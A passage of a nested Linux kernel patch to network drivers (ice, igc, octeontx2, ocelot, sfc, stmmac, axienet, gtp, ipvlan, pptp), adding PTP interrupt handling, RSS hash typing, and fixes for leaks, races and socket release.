++enum ice_misc_thread_tasks {
++	ICE_MISC_THREAD_EXTTS_EVENT,
++	ICE_MISC_THREAD_TX_TSTAMP,
++	ICE_MISC_THREAD_NBITS		/* must be last */
++};
++
+ struct ice_switchdev_info {
+ 	struct ice_vsi *control_vsi;
+ 	struct ice_vsi *uplink_vsi;
+@@ -532,6 +538,7 @@ struct ice_pf {
+ 	DECLARE_BITMAP(features, ICE_F_MAX);
+ 	DECLARE_BITMAP(state, ICE_STATE_NBITS);
+ 	DECLARE_BITMAP(flags, ICE_PF_FLAGS_NBITS);
++	DECLARE_BITMAP(misc_thread, ICE_MISC_THREAD_NBITS);
+ 	unsigned long *avail_txqs;	/* bitmap to track PF Tx queue usage */
+ 	unsigned long *avail_rxqs;	/* bitmap to track PF Rx queue usage */
+ 	unsigned long serv_tmr_period;
+diff --git a/drivers/net/ethernet/intel/ice/ice_main.c b/drivers/net/ethernet/intel/ice/ice_main.c
+index 4095fe40dfc9b..7a5ec3ce3407a 100644
+--- a/drivers/net/ethernet/intel/ice/ice_main.c
++++ b/drivers/net/ethernet/intel/ice/ice_main.c
+@@ -3116,20 +3116,28 @@ static irqreturn_t ice_misc_intr(int __always_unused irq, void *data)
+ 
+ 	if (oicr & PFINT_OICR_TSYN_TX_M) {
+ 		ena_mask &= ~PFINT_OICR_TSYN_TX_M;
+-		if (!hw->reset_ongoing)
++		if (!hw->reset_ongoing) {
++			set_bit(ICE_MISC_THREAD_TX_TSTAMP, pf->misc_thread);
+ 			ret = IRQ_WAKE_THREAD;
++		}
+ 	}
+ 
+ 	if (oicr & PFINT_OICR_TSYN_EVNT_M) {
+ 		u8 tmr_idx = hw->func_caps.ts_func_info.tmr_index_owned;
+ 		u32 gltsyn_stat = rd32(hw, GLTSYN_STAT(tmr_idx));
+ 
+-		/* Save EVENTs from GTSYN register */
+-		pf->ptp.ext_ts_irq |= gltsyn_stat & (GLTSYN_STAT_EVENT0_M |
+-						     GLTSYN_STAT_EVENT1_M |
+-						     GLTSYN_STAT_EVENT2_M);
+ 		ena_mask &= ~PFINT_OICR_TSYN_EVNT_M;
+-		kthread_queue_work(pf->ptp.kworker, &pf->ptp.extts_work);
++
++		if (hw->func_caps.ts_func_info.src_tmr_owned) {
++			/* Save EVENTs from GLTSYN register */
++			pf->ptp.ext_ts_irq |= gltsyn_stat &
++					      (GLTSYN_STAT_EVENT0_M |
++					       GLTSYN_STAT_EVENT1_M |
++					       GLTSYN_STAT_EVENT2_M);
++
++			set_bit(ICE_MISC_THREAD_EXTTS_EVENT, pf->misc_thread);
++			ret = IRQ_WAKE_THREAD;
++		}
+ 	}
+ 
+ #define ICE_AUX_CRIT_ERR (PFINT_OICR_PE_CRITERR_M | PFINT_OICR_HMC_ERR_M | PFINT_OICR_PE_PUSH_M)
+@@ -3173,8 +3181,13 @@ static irqreturn_t ice_misc_intr_thread_fn(int __always_unused irq, void *data)
+ 	if (ice_is_reset_in_progress(pf->state))
+ 		return IRQ_HANDLED;
+ 
+-	while (!ice_ptp_process_ts(pf))
+-		usleep_range(50, 100);
++	if (test_and_clear_bit(ICE_MISC_THREAD_EXTTS_EVENT, pf->misc_thread))
++		ice_ptp_extts_event(pf);
++
++	if (test_and_clear_bit(ICE_MISC_THREAD_TX_TSTAMP, pf->misc_thread)) {
++		while (!ice_ptp_process_ts(pf))
++			usleep_range(50, 100);
++	}
+ 
+ 	return IRQ_HANDLED;
+ }
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.c b/drivers/net/ethernet/intel/ice/ice_ptp.c
+index a3585ede829bb..46b0063a5e128 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp.c
++++ b/drivers/net/ethernet/intel/ice/ice_ptp.c
+@@ -1478,15 +1478,11 @@ static int ice_ptp_adjfine(struct ptp_clock_info *info, long scaled_ppm)
+ }
+ 
+ /**
+- * ice_ptp_extts_work - Workqueue task function
+- * @work: external timestamp work structure
+- *
+- * Service for PTP external clock event
++ * ice_ptp_extts_event - Process PTP external clock event
++ * @pf: Board private structure
+  */
+-static void ice_ptp_extts_work(struct kthread_work *work)
++void ice_ptp_extts_event(struct ice_pf *pf)
+ {
+-	struct ice_ptp *ptp = container_of(work, struct ice_ptp, extts_work);
+-	struct ice_pf *pf = container_of(ptp, struct ice_pf, ptp);
+ 	struct ptp_clock_event event;
+ 	struct ice_hw *hw = &pf->hw;
+ 	u8 chan, tmr_idx;
+@@ -2512,7 +2508,6 @@ void ice_ptp_prepare_for_reset(struct ice_pf *pf)
+ 	ice_ptp_cfg_timestamp(pf, false);
+ 
+ 	kthread_cancel_delayed_work_sync(&ptp->work);
+-	kthread_cancel_work_sync(&ptp->extts_work);
+ 
+ 	if (test_bit(ICE_PFR_REQ, pf->state))
+ 		return;
+@@ -2610,7 +2605,6 @@ static int ice_ptp_init_work(struct ice_pf *pf, struct ice_ptp *ptp)
+ 
+ 	/* Initialize work functions */
+ 	kthread_init_delayed_work(&ptp->work, ice_ptp_periodic_work);
+-	kthread_init_work(&ptp->extts_work, ice_ptp_extts_work);
+ 
+ 	/* Allocate a kworker for handling work required for the ports
+ 	 * connected to the PTP hardware clock.
+diff --git a/drivers/net/ethernet/intel/ice/ice_ptp.h b/drivers/net/ethernet/intel/ice/ice_ptp.h
+index 028349295b719..e689c05bb001f 100644
+--- a/drivers/net/ethernet/intel/ice/ice_ptp.h
++++ b/drivers/net/ethernet/intel/ice/ice_ptp.h
+@@ -159,7 +159,6 @@ struct ice_ptp_port {
+  * struct ice_ptp - data used for integrating with CONFIG_PTP_1588_CLOCK
+  * @port: data for the PHY port initialization procedure
+  * @work: delayed work function for periodic tasks
+- * @extts_work: work function for handling external Tx timestamps
+  * @cached_phc_time: a cached copy of the PHC time for timestamp extension
+  * @cached_phc_jiffies: jiffies when cached_phc_time was last updated
+  * @ext_ts_chan: the external timestamp channel in use
+@@ -180,7 +179,6 @@ struct ice_ptp_port {
+ struct ice_ptp {
+ 	struct ice_ptp_port port;
+ 	struct kthread_delayed_work work;
+-	struct kthread_work extts_work;
+ 	u64 cached_phc_time;
+ 	unsigned long cached_phc_jiffies;
+ 	u8 ext_ts_chan;
+@@ -246,6 +244,7 @@ int ice_ptp_get_ts_config(struct ice_pf *pf, struct ifreq *ifr);
+ void ice_ptp_cfg_timestamp(struct ice_pf *pf, bool ena);
+ int ice_get_ptp_clock_index(struct ice_pf *pf);
+ 
++void ice_ptp_extts_event(struct ice_pf *pf);
+ s8 ice_ptp_request_ts(struct ice_ptp_tx *tx, struct sk_buff *skb);
+ bool ice_ptp_process_ts(struct ice_pf *pf);
+ 
+@@ -274,6 +273,7 @@ static inline int ice_get_ptp_clock_index(struct ice_pf *pf)
+ 	return -1;
+ }
+ 
++static inline void ice_ptp_extts_event(struct ice_pf *pf) { }
+ static inline s8
+ ice_ptp_request_ts(struct ice_ptp_tx *tx, struct sk_buff *skb)
+ {
+diff --git a/drivers/net/ethernet/intel/igc/igc.h b/drivers/net/ethernet/intel/igc/igc.h
+index df3e26c0cf01a..f83cbc4a1afa8 100644
+--- a/drivers/net/ethernet/intel/igc/igc.h
++++ b/drivers/net/ethernet/intel/igc/igc.h
+@@ -13,6 +13,7 @@
+ #include <linux/ptp_clock_kernel.h>
+ #include <linux/timecounter.h>
+ #include <linux/net_tstamp.h>
++#include <linux/bitfield.h>
+ 
+ #include "igc_hw.h"
+ 
+@@ -311,6 +312,33 @@ extern char igc_driver_name[];
+ #define IGC_MRQC_RSS_FIELD_IPV4_UDP	0x00400000
+ #define IGC_MRQC_RSS_FIELD_IPV6_UDP	0x00800000
+ 
++/* RX-desc Write-Back format RSS Type's */
++enum igc_rss_type_num {
++	IGC_RSS_TYPE_NO_HASH		= 0,
++	IGC_RSS_TYPE_HASH_TCP_IPV4	= 1,
++	IGC_RSS_TYPE_HASH_IPV4		= 2,
++	IGC_RSS_TYPE_HASH_TCP_IPV6	= 3,
++	IGC_RSS_TYPE_HASH_IPV6_EX	= 4,
++	IGC_RSS_TYPE_HASH_IPV6		= 5,
++	IGC_RSS_TYPE_HASH_TCP_IPV6_EX	= 6,
++	IGC_RSS_TYPE_HASH_UDP_IPV4	= 7,
++	IGC_RSS_TYPE_HASH_UDP_IPV6	= 8,
++	IGC_RSS_TYPE_HASH_UDP_IPV6_EX	= 9,
++	IGC_RSS_TYPE_MAX		= 10,
++};
++#define IGC_RSS_TYPE_MAX_TABLE		16
++#define IGC_RSS_TYPE_MASK		GENMASK(3,0) /* 4-bits (3:0) = mask 0x0F */
++
++/* igc_rss_type - Rx descriptor RSS type field */
++static inline u32 igc_rss_type(const union igc_adv_rx_desc *rx_desc)
++{
++	/* RSS Type 4-bits (3:0) number: 0-9 (above 9 is reserved)
++	 * Accessing the same bits via u16 (wb.lower.lo_dword.hs_rss.pkt_info)
++	 * is slightly slower than via u32 (wb.lower.lo_dword.data)
++	 */
++	return le32_get_bits(rx_desc->wb.lower.lo_dword.data, IGC_RSS_TYPE_MASK);
++}
++
+ /* Interrupt defines */
+ #define IGC_START_ITR			648 /* ~6000 ints/sec */
+ #define IGC_4K_ITR			980
+diff --git a/drivers/net/ethernet/intel/igc/igc_main.c b/drivers/net/ethernet/intel/igc/igc_main.c
+index 3509974c1f8e4..b67a6a81474f5 100644
+--- a/drivers/net/ethernet/intel/igc/igc_main.c
++++ b/drivers/net/ethernet/intel/igc/igc_main.c
+@@ -1684,14 +1684,36 @@ static void igc_rx_checksum(struct igc_ring *ring,
+ 		   le32_to_cpu(rx_desc->wb.upper.status_error));
+ }
+ 
++/* Mapping HW RSS Type to enum pkt_hash_types */
++static const enum pkt_hash_types igc_rss_type_table[IGC_RSS_TYPE_MAX_TABLE] = {
++	[IGC_RSS_TYPE_NO_HASH]		= PKT_HASH_TYPE_L2,
++	[IGC_RSS_TYPE_HASH_TCP_IPV4]	= PKT_HASH_TYPE_L4,
++	[IGC_RSS_TYPE_HASH_IPV4]	= PKT_HASH_TYPE_L3,
++	[IGC_RSS_TYPE_HASH_TCP_IPV6]	= PKT_HASH_TYPE_L4,
++	[IGC_RSS_TYPE_HASH_IPV6_EX]	= PKT_HASH_TYPE_L3,
++	[IGC_RSS_TYPE_HASH_IPV6]	= PKT_HASH_TYPE_L3,
++	[IGC_RSS_TYPE_HASH_TCP_IPV6_EX] = PKT_HASH_TYPE_L4,
++	[IGC_RSS_TYPE_HASH_UDP_IPV4]	= PKT_HASH_TYPE_L4,
++	[IGC_RSS_TYPE_HASH_UDP_IPV6]	= PKT_HASH_TYPE_L4,
++	[IGC_RSS_TYPE_HASH_UDP_IPV6_EX] = PKT_HASH_TYPE_L4,
++	[10] = PKT_HASH_TYPE_NONE, /* RSS Type above 9 "Reserved" by HW  */
++	[11] = PKT_HASH_TYPE_NONE, /* keep array sized for SW bit-mask   */
++	[12] = PKT_HASH_TYPE_NONE, /* to handle future HW revisons       */
++	[13] = PKT_HASH_TYPE_NONE,
++	[14] = PKT_HASH_TYPE_NONE,
++	[15] = PKT_HASH_TYPE_NONE,
++};
++
+ static inline void igc_rx_hash(struct igc_ring *ring,
+ 			       union igc_adv_rx_desc *rx_desc,
+ 			       struct sk_buff *skb)
+ {
+-	if (ring->netdev->features & NETIF_F_RXHASH)
+-		skb_set_hash(skb,
+-			     le32_to_cpu(rx_desc->wb.lower.hi_dword.rss),
+-			     PKT_HASH_TYPE_L3);
++	if (ring->netdev->features & NETIF_F_RXHASH) {
++		u32 rss_hash = le32_to_cpu(rx_desc->wb.lower.hi_dword.rss);
++		u32 rss_type = igc_rss_type(rx_desc);
++
++		skb_set_hash(skb, rss_hash, igc_rss_type_table[rss_type]);
++	}
+ }
+ 
+ static void igc_rx_vlan(struct igc_ring *rx_ring,
+@@ -6518,6 +6540,7 @@ static int igc_probe(struct pci_dev *pdev,
+ 	netdev->features |= NETIF_F_TSO;
+ 	netdev->features |= NETIF_F_TSO6;
+ 	netdev->features |= NETIF_F_TSO_ECN;
++	netdev->features |= NETIF_F_RXHASH;
+ 	netdev->features |= NETIF_F_RXCSUM;
+ 	netdev->features |= NETIF_F_HW_CSUM;
+ 	netdev->features |= NETIF_F_SCTP_CRC;
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+index afdddfced7e69..65c0373d34d12 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/cgx.c
+@@ -167,6 +167,9 @@ void cgx_lmac_write(int cgx_id, int lmac_id, u64 offset, u64 val)
+ {
+ 	struct cgx *cgx_dev = cgx_get_pdata(cgx_id);
+ 
++	/* Software must not access disabled LMAC registers */
++	if (!is_lmac_valid(cgx_dev, lmac_id))
++		return;
+ 	cgx_write(cgx_dev, lmac_id, offset, val);
+ }
+ 
+@@ -174,6 +177,10 @@ u64 cgx_lmac_read(int cgx_id, int lmac_id, u64 offset)
+ {
+ 	struct cgx *cgx_dev = cgx_get_pdata(cgx_id);
+ 
++	/* Software must not access disabled LMAC registers */
++	if (!is_lmac_valid(cgx_dev, lmac_id))
++		return 0;
++
+ 	return cgx_read(cgx_dev, lmac_id, offset);
+ }
+ 
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+index d493b533cf76e..a3346ea7876c5 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu.h
+@@ -23,6 +23,7 @@
+ #define	PCI_DEVID_OCTEONTX2_LBK			0xA061
+ 
+ /* Subsystem Device ID */
++#define PCI_SUBSYS_DEVID_98XX                  0xB100
+ #define PCI_SUBSYS_DEVID_96XX                  0xB200
+ #define PCI_SUBSYS_DEVID_CN10K_A	       0xB900
+ #define PCI_SUBSYS_DEVID_CNF10K_B              0xBC00
+@@ -646,6 +647,16 @@ static inline u16 rvu_nix_chan_cpt(struct rvu *rvu, u8 chan)
+ 	return rvu->hw->cpt_chan_base + chan;
+ }
+ 
++static inline bool is_rvu_supports_nix1(struct rvu *rvu)
++{
++	struct pci_dev *pdev = rvu->pdev;
++
++	if (pdev->subsystem_device == PCI_SUBSYS_DEVID_98XX)
++		return true;
++
++	return false;
++}
++
+ /* Function Prototypes
+  * RVU
+  */
+diff --git a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+index 9eca38547b783..c60b9580ca969 100644
+--- a/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
++++ b/drivers/net/ethernet/marvell/octeontx2/af/rvu_cgx.c
+@@ -112,7 +112,7 @@ static void rvu_map_cgx_nix_block(struct rvu *rvu, int pf,
+ 	p2x = cgx_lmac_get_p2x(cgx_id, lmac_id);
+ 	/* Firmware sets P2X_SELECT as either NIX0 or NIX1 */
+ 	pfvf->nix_blkaddr = BLKADDR_NIX0;
+-	if (p2x == CMR_P2X_SEL_NIX1)
++	if (is_rvu_supports_nix1(rvu) && p2x == CMR_P2X_SEL_NIX1)
+ 		pfvf->nix_blkaddr = BLKADDR_NIX1;
+ }
+ 
+@@ -751,7 +751,7 @@ static int rvu_cgx_ptp_rx_cfg(struct rvu *rvu, u16 pcifunc, bool enable)
+ 	cgxd = rvu_cgx_pdata(cgx_id, rvu);
+ 
+ 	mac_ops = get_mac_ops(cgxd);
+-	mac_ops->mac_enadis_ptp_config(cgxd, lmac_id, true);
++	mac_ops->mac_enadis_ptp_config(cgxd, lmac_id, enable);
+ 	/* If PTP is enabled then inform NPC that packets to be
+ 	 * parsed by this PF will have their data shifted by 8 bytes
+ 	 * and if PTP is disabled then no shift is required
+diff --git a/drivers/net/ethernet/mellanox/mlxsw/minimal.c b/drivers/net/ethernet/mellanox/mlxsw/minimal.c
+index 55b3c42bb0071..15116d9305f8e 100644
+--- a/drivers/net/ethernet/mellanox/mlxsw/minimal.c
++++ b/drivers/net/ethernet/mellanox/mlxsw/minimal.c
+@@ -430,6 +430,7 @@ static int mlxsw_m_linecards_init(struct mlxsw_m *mlxsw_m)
+ err_kmalloc_array:
+ 	for (i--; i >= 0; i--)
+ 		kfree(mlxsw_m->line_cards[i]);
++	kfree(mlxsw_m->line_cards);
+ err_kcalloc:
+ 	kfree(mlxsw_m->ports);
+ 	return err;
+diff --git a/drivers/net/ethernet/mscc/ocelot.c b/drivers/net/ethernet/mscc/ocelot.c
+index 13b14110a0603..01b6e13f4692f 100644
+--- a/drivers/net/ethernet/mscc/ocelot.c
++++ b/drivers/net/ethernet/mscc/ocelot.c
+@@ -2728,7 +2728,6 @@ int ocelot_init(struct ocelot *ocelot)
+ 		}
+ 	}
+ 
+-	mutex_init(&ocelot->ptp_lock);
+ 	mutex_init(&ocelot->mact_lock);
+ 	mutex_init(&ocelot->fwd_domain_lock);
+ 	mutex_init(&ocelot->tas_lock);
+diff --git a/drivers/net/ethernet/mscc/ocelot_ptp.c b/drivers/net/ethernet/mscc/ocelot_ptp.c
+index 2180ae94c7447..cb32234a5bf1b 100644
+--- a/drivers/net/ethernet/mscc/ocelot_ptp.c
++++ b/drivers/net/ethernet/mscc/ocelot_ptp.c
+@@ -439,8 +439,12 @@ static int ocelot_ipv6_ptp_trap_del(struct ocelot *ocelot, int port)
+ static int ocelot_setup_ptp_traps(struct ocelot *ocelot, int port,
+ 				  bool l2, bool l4)
+ {
++	struct ocelot_port *ocelot_port = ocelot->ports[port];
+ 	int err;
+ 
++	ocelot_port->trap_proto &= ~(OCELOT_PROTO_PTP_L2 |
++				     OCELOT_PROTO_PTP_L4);
++
+ 	if (l2)
+ 		err = ocelot_l2_ptp_trap_add(ocelot, port);
+ 	else
+@@ -464,6 +468,11 @@ static int ocelot_setup_ptp_traps(struct ocelot *ocelot, int port,
+ 	if (err)
+ 		return err;
+ 
++	if (l2)
++		ocelot_port->trap_proto |= OCELOT_PROTO_PTP_L2;
++	if (l4)
++		ocelot_port->trap_proto |= OCELOT_PROTO_PTP_L4;
++
+ 	return 0;
+ 
+ err_ipv6:
+@@ -474,10 +483,38 @@ err_ipv4:
+ 	return err;
+ }
+ 
++static int ocelot_traps_to_ptp_rx_filter(unsigned int proto)
++{
++	if ((proto & OCELOT_PROTO_PTP_L2) && (proto & OCELOT_PROTO_PTP_L4))
++		return HWTSTAMP_FILTER_PTP_V2_EVENT;
++	else if (proto & OCELOT_PROTO_PTP_L2)
++		return HWTSTAMP_FILTER_PTP_V2_L2_EVENT;
++	else if (proto & OCELOT_PROTO_PTP_L4)
++		return HWTSTAMP_FILTER_PTP_V2_L4_EVENT;
++
++	return HWTSTAMP_FILTER_NONE;
++}
++
+ int ocelot_hwstamp_get(struct ocelot *ocelot, int port, struct ifreq *ifr)
+ {
+-	return copy_to_user(ifr->ifr_data, &ocelot->hwtstamp_config,
+-			    sizeof(ocelot->hwtstamp_config)) ? -EFAULT : 0;
++	struct ocelot_port *ocelot_port = ocelot->ports[port];
++	struct hwtstamp_config cfg = {};
++
++	switch (ocelot_port->ptp_cmd) {
++	case IFH_REW_OP_TWO_STEP_PTP:
++		cfg.tx_type = HWTSTAMP_TX_ON;
++		break;
++	case IFH_REW_OP_ORIGIN_PTP:
++		cfg.tx_type = HWTSTAMP_TX_ONESTEP_SYNC;
++		break;
++	default:
++		cfg.tx_type = HWTSTAMP_TX_OFF;
++		break;
++	}
++
++	cfg.rx_filter = ocelot_traps_to_ptp_rx_filter(ocelot_port->trap_proto);
++
++	return copy_to_user(ifr->ifr_data, &cfg, sizeof(cfg)) ? -EFAULT : 0;
+ }
+ EXPORT_SYMBOL(ocelot_hwstamp_get);
+ 
+@@ -509,8 +546,6 @@ int ocelot_hwstamp_set(struct ocelot *ocelot, int port, struct ifreq *ifr)
+ 		return -ERANGE;
+ 	}
+ 
+-	mutex_lock(&ocelot->ptp_lock);
+-
+ 	switch (cfg.rx_filter) {
+ 	case HWTSTAMP_FILTER_NONE:
+ 		break;
+@@ -531,28 +566,14 @@ int ocelot_hwstamp_set(struct ocelot *ocelot, int port, struct ifreq *ifr)
+ 		l4 = true;
+ 		break;
+ 	default:
+-		mutex_unlock(&ocelot->ptp_lock);
+ 		return -ERANGE;
+ 	}
+ 
+ 	err = ocelot_setup_ptp_traps(ocelot, port, l2, l4);
+-	if (err) {
+-		mutex_unlock(&ocelot->ptp_lock);
++	if (err)
+ 		return err;
+-	}
+ 
+-	if (l2 && l4)
+-		cfg.rx_filter = HWTSTAMP_FILTER_PTP_V2_EVENT;
+-	else if (l2)
+-		cfg.rx_filter = HWTSTAMP_FILTER_PTP_V2_L2_EVENT;
+-	else if (l4)
+-		cfg.rx_filter = HWTSTAMP_FILTER_PTP_V2_L4_EVENT;
+-	else
+-		cfg.rx_filter = HWTSTAMP_FILTER_NONE;
+-
+-	/* Commit back the result & save it */
+-	memcpy(&ocelot->hwtstamp_config, &cfg, sizeof(cfg));
+-	mutex_unlock(&ocelot->ptp_lock);
++	cfg.rx_filter = ocelot_traps_to_ptp_rx_filter(ocelot_port->trap_proto);
+ 
+ 	return copy_to_user(ifr->ifr_data, &cfg, sizeof(cfg)) ? -EFAULT : 0;
+ }
+@@ -824,11 +845,6 @@ int ocelot_init_timestamp(struct ocelot *ocelot,
+ 
+ 	ocelot_write(ocelot, PTP_CFG_MISC_PTP_EN, PTP_CFG_MISC);
+ 
+-	/* There is no device reconfiguration, PTP Rx stamping is always
+-	 * enabled.
+-	 */
+-	ocelot->hwtstamp_config.rx_filter = HWTSTAMP_FILTER_PTP_V2_EVENT;
+-
+ 	return 0;
+ }
+ EXPORT_SYMBOL(ocelot_init_timestamp);
+diff --git a/drivers/net/ethernet/sfc/ef10.c b/drivers/net/ethernet/sfc/ef10.c
+index b63e47af63655..8c019f382a7f3 100644
+--- a/drivers/net/ethernet/sfc/ef10.c
++++ b/drivers/net/ethernet/sfc/ef10.c
+@@ -1297,8 +1297,10 @@ static void efx_ef10_fini_nic(struct efx_nic *efx)
+ {
+ 	struct efx_ef10_nic_data *nic_data = efx->nic_data;
+ 
++	spin_lock_bh(&efx->stats_lock);
+ 	kfree(nic_data->mc_stats);
+ 	nic_data->mc_stats = NULL;
++	spin_unlock_bh(&efx->stats_lock);
+ }
+ 
+ static int efx_ef10_init_nic(struct efx_nic *efx)
+@@ -1852,9 +1854,14 @@ static size_t efx_ef10_update_stats_pf(struct efx_nic *efx, u64 *full_stats,
+ 
+ 	efx_ef10_get_stat_mask(efx, mask);
+ 
+-	efx_nic_copy_stats(efx, nic_data->mc_stats);
+-	efx_nic_update_stats(efx_ef10_stat_desc, EF10_STAT_COUNT,
+-			     mask, stats, nic_data->mc_stats, false);
++	/* If NIC was fini'd (probably resetting), then we can't read
++	 * updated stats right now.
++	 */
++	if (nic_data->mc_stats) {
++		efx_nic_copy_stats(efx, nic_data->mc_stats);
++		efx_nic_update_stats(efx_ef10_stat_desc, EF10_STAT_COUNT,
++				     mask, stats, nic_data->mc_stats, false);
++	}
+ 
+ 	/* Update derived statistics */
+ 	efx_nic_fix_nodesc_drop_stat(efx,
+diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+index 30ce073055785..a07bcb2f5d2e2 100644
+--- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
++++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c
+@@ -7388,12 +7388,6 @@ int stmmac_dvr_remove(struct device *dev)
+ 	netif_carrier_off(ndev);
+ 	unregister_netdev(ndev);
+ 
+-	/* Serdes power down needs to happen after VLAN filter
+-	 * is deleted that is triggered by unregister_netdev().
+-	 */
+-	if (priv->plat->serdes_powerdown)
+-		priv->plat->serdes_powerdown(ndev, priv->plat->bsp_priv);
+-
+ #ifdef CONFIG_DEBUG_FS
+ 	stmmac_exit_fs(ndev);
+ #endif
+diff --git a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+index d1d772580da98..d14648558338b 100644
+--- a/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
++++ b/drivers/net/ethernet/xilinx/xilinx_axienet_main.c
+@@ -2043,6 +2043,11 @@ static int axienet_probe(struct platform_device *pdev)
+ 		goto cleanup_clk;
+ 	}
+ 
++	/* Reset core now that clocks are enabled, prior to accessing MDIO */
++	ret = __axienet_device_reset(lp);
++	if (ret)
++		goto cleanup_clk;
++
+ 	/* Autodetect the need for 64-bit DMA pointers.
+ 	 * When the IP is configured for a bus width bigger than 32 bits,
+ 	 * writing the MSB registers is mandatory, even if they are all 0.
+@@ -2097,11 +2102,6 @@ static int axienet_probe(struct platform_device *pdev)
+ 	lp->coalesce_count_tx = XAXIDMA_DFT_TX_THRESHOLD;
+ 	lp->coalesce_usec_tx = XAXIDMA_DFT_TX_USEC;
+ 
+-	/* Reset core now that clocks are enabled, prior to accessing MDIO */
+-	ret = __axienet_device_reset(lp);
+-	if (ret)
+-		goto cleanup_clk;
+-
+ 	ret = axienet_mdio_setup(lp);
+ 	if (ret)
+ 		dev_warn(&pdev->dev,
+diff --git a/drivers/net/gtp.c b/drivers/net/gtp.c
+index 15c7dc82107f4..acb20ad4e37eb 100644
+--- a/drivers/net/gtp.c
++++ b/drivers/net/gtp.c
+@@ -631,7 +631,9 @@ static void __gtp_encap_destroy(struct sock *sk)
+ 			gtp->sk1u = NULL;
+ 		udp_sk(sk)->encap_type = 0;
+ 		rcu_assign_sk_user_data(sk, NULL);
++		release_sock(sk);
+ 		sock_put(sk);
++		return;
+ 	}
+ 	release_sock(sk);
+ }
+diff --git a/drivers/net/ipvlan/ipvlan_core.c b/drivers/net/ipvlan/ipvlan_core.c
+index 2de3bd3b0c278..59e29e08398a0 100644
+--- a/drivers/net/ipvlan/ipvlan_core.c
++++ b/drivers/net/ipvlan/ipvlan_core.c
+@@ -585,7 +585,8 @@ static int ipvlan_xmit_mode_l3(struct sk_buff *skb, struct net_device *dev)
+ 				consume_skb(skb);
+ 				return NET_XMIT_DROP;
+ 			}
+-			return ipvlan_rcv_frame(addr, &skb, true);
++			ipvlan_rcv_frame(addr, &skb, true);
++			return NET_XMIT_SUCCESS;
+ 		}
+ 	}
+ out:
+@@ -611,7 +612,8 @@ static int ipvlan_xmit_mode_l2(struct sk_buff *skb, struct net_device *dev)
+ 					consume_skb(skb);
+ 					return NET_XMIT_DROP;
+ 				}
+-				return ipvlan_rcv_frame(addr, &skb, true);
++				ipvlan_rcv_frame(addr, &skb, true);
++				return NET_XMIT_SUCCESS;
+ 			}
+ 		}
+ 		skb = skb_share_check(skb, GFP_ATOMIC);
+@@ -623,7 +625,8 @@ static int ipvlan_xmit_mode_l2(struct sk_buff *skb, struct net_device *dev)
+ 		 * the skb for the main-dev. At the RX side we just return
+ 		 * RX_PASS for it to be processed further on the stack.
+ 		 */
+-		return dev_forward_skb(ipvlan->phy_dev, skb);
++		dev_forward_skb(ipvlan->phy_dev, skb);
++		return NET_XMIT_SUCCESS;
+ 
+ 	} else if (is_multicast_ether_addr(eth->h_dest)) {
+ 		skb_reset_mac_header(skb);
+diff --git a/drivers/net/ppp/pptp.c b/drivers/net/ppp/pptp.c
+index 0fe78826c8fa4..32183f24e63ff 100644
+--- a/drivers/net/ppp/pptp.c
++++ b/drivers/net/ppp/pptp.c
+@@ -24,6 +24,7 @@
+ #include <linux/in.h>
+ #include <linux/ip.h>
+ #include <linux/rcupdate.h>
++#include <linux/security.h>
+ #include <linux/spinlock.h>
+ 
+ #include <net/sock.h>
+@@ -128,6 +129,23 @@ static void del_chan(struct pppox_sock *sock)
+ 	spin_unlock(&chan_lock);
+ }
+ 
++static struct rtable *pptp_route_output(struct pppox_sock *po,
++					struct flowi4 *fl4)
++{
++	struct sock *sk = &po->sk;
++	struct net *net;
++
++	net = sock_net(sk);
++	flowi4_init_output(fl4, sk->sk_bound_dev_if, sk->sk_mark, 0,
++			   RT_SCOPE_UNIVERSE, IPPROTO_GRE, 0,
++			   po->proto.pptp.dst_addr.sin_addr.s_addr,
++			   po->proto.pptp.src_addr.sin_addr.s_addr,
++			   0, 0, sock_net_uid(net, sk));
++	security_sk_classify_flow(sk, flowi4_to_flowi_common(fl4));
++
++	return ip_route_output_flow(net, fl4, sk);
++}
++
+ static int pptp_xmit(struct ppp_channel *chan, struct sk_buff *skb)
+ {
+ 	struct sock *sk = (struct sock *) chan->private;
+@@ -151,11 +169,7 @@ static int pptp_xmit(struct ppp_channel *chan, struct sk_buff *skb)
+ 	if (sk_pppox(po)->sk_state & PPPOX_DEAD)
+ 		goto tx_error;
+ 
+-	rt = ip_route_output_ports(net, &fl4, NULL,
+-				   opt->dst_addr.sin_addr.s_addr,
+-				   opt->src_addr.sin_addr.s_addr,
+-				   0, 0, IPPROTO_GRE,
+-				   RT_TOS(0), sk->sk_bound_dev_if);
++	rt = pptp_route_output(po, &fl4);
+ 	if (IS_ERR(rt))
+ 		goto tx_error;
+ 
+@@ -438,12 +452,7 @@ static int pptp_connect(struct socket *sock, struct sockaddr *uservaddr,
+ 	po->chan.private = sk;
+ 	po->chan.ops = &pptp_chan_ops;
+ 
+-	rt = ip_route_output_ports(sock_net(sk), &fl4, sk,
+-				   opt->dst_addr.sin_addr.s_addr,
+-				   opt->src_addr.sin_addr.s_addr,
+-				   0, 0,
+-				   IPPROTO_GRE, RT_CONN_FLAGS(sk),
+-				   sk->sk_bound_dev_if);
++	rt = pptp_route_output(po, &fl4);
+ 	if (IS_ERR(rt)) {
+ 		error = -EHOSTUNREACH;
+ 		goto end;
+diff --git a/drivers/net/wireguard/netlink.c b/drivers/net/wireguard/netlink.c
+index 43c8c84e7ea82..6d1bd9f52d02a 100644
